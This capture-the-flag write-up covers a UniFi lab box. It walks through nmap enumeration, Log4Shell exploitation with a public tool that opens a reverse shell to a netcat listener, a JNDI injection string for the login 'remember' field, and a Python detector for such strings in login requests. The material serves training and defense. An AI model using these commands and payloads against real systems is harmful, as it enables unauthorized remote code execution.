# Unified

## Enumeration

Running an extensive nmap scan shows quite a lot (I cut out most of the unneeded output):

`sudo nmap -p- -sC -sV <IP>`

```
PORT     STATE    SERVICE         REASON         VERSION
22/tcp   open     ssh             syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp filtered ibm-db2-admin   no-response
8080/tcp open     http-proxy      syn-ack ttl 63
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.129.104.243:8443/manage
|_http-open-proxy: Proxy might be redirecting requests
8443/tcp open     ssl/nagios-nsca syn-ack ttl 63 Nagios NSCA
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York
| Subject Alternative Name: DNS:UniFi
| Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
<SNIP>
```

The machine seems to be a UniFi AP, and I am presented with a login page when navigating to the IP on port 8443 in the browser. The default credentials ubnt:ubnt did not work. I found the Metasploit module multi/http/ubiquiti\_unifi\_log4shell, but it did not work.

## Discovering Log4Shell

Researching the version of the service, I found out it should be vulnerable to Log4Shell.

<https://pythonawesome.com/exploiting-cve-2021-44228-in-unifi-network-application-for-remote-code-execution-and-more/>

```
yay openjdk #chose (jre11 openjdk)

sudo pacman -S maven #chose (jre11)

sudo pacman -S python-pip

git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi && cd Log4jUnifi && pip install -r requirements.txt

mvn package -f utils/rogue-jndi/

sudo pacman -S docker

git clone https://aur.archlinux.org/docker-git.git
cd docker-git
makepkg -sri

systemctl start docker

git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi
mv Log4jUnifi log4junifi
cd log4junifi
sudo docker build -t log4junifi .

nc -lnvp 4444 #In a separate terminal

sudo docker run -it -v $(pwd)/loot:/log4junifi/loot -p 8090:8090 -p 1389:1389 log4junifi -u https://10.129.104.243:8443 -i 10.10.16.4 -p 4444
```

This way I could get a shell on the system. Obviously this is the script-kiddie way, as I used a rogue JNDI server prepared by someone else, but learning to do everything manually did not fit my time plans for this box.

I later found out that I also could have injected a payload of the format `${jndi:ldap://{Tun0 IP Address}/whatever}` into the "remember" field at the login page, which would have made things a lot easier.
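From the defender's side, a lookup string in the "remember" field is easy to spot in captured login request bodies. The following is an added example, not part of the original writeup or of any UniFi tooling: it walks a JSON body, URL-decodes each string value and reports the field, protocol and callback host of any JNDI lookup. The sample bodies are constructed, and every field name other than "remember" is an assumption.

```python
import json
import re
from urllib.parse import unquote

# Matches a Log4j JNDI lookup and captures the protocol and callback host.
JNDI_RE = re.compile(r"\$\{jndi:(?P<proto>[a-z]+)://(?P<host>[^/:}\s]+)", re.IGNORECASE)

def iter_strings(node, path=""):
    """Yield (json_path, value) for every string in a decoded JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from iter_strings(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from iter_strings(value, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node

def find_jndi_lookups(body):
    """Return one finding per string field that carries a JNDI lookup."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        doc = body  # not JSON: scan the raw text as a single string
    findings = []
    for path, value in iter_strings(doc):
        match = JNDI_RE.search(unquote(value))  # decode %24%7B... first
        if match:
            findings.append({"field": path or "<raw>",
                             "proto": match["proto"].lower(),
                             "host": match["host"]})
    return findings

# Constructed login bodies; 192.0.2.10 is a documentation address.
# Field names other than "remember" are assumed for illustration.
SAMPLES = [
    '{"username":"michael","password":"x","remember":true,"strict":true}',
    '{"username":"a","password":"b","remember":"${jndi:ldap://192.0.2.10/whatever}"}',
    '{"username":"a","password":"b","remember":"%24%7BJNDI:ldap://192.0.2.10:1389/o%7D"}',
]

def scan(samples=SAMPLES):
    return [find_jndi_lookups(s) for s in samples]

if __name__ == "__main__":
    for body, hits in zip(SAMPLES, scan()):
        print("ALERT" if hits else "ok   ", hits or body[:40])
```

The extracted callback host is what to search for in egress firewall and DNS logs to confirm whether the application actually reached out.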

```
cat /home/michael/user.txt
```

```
6ced<SNIP>a127
```

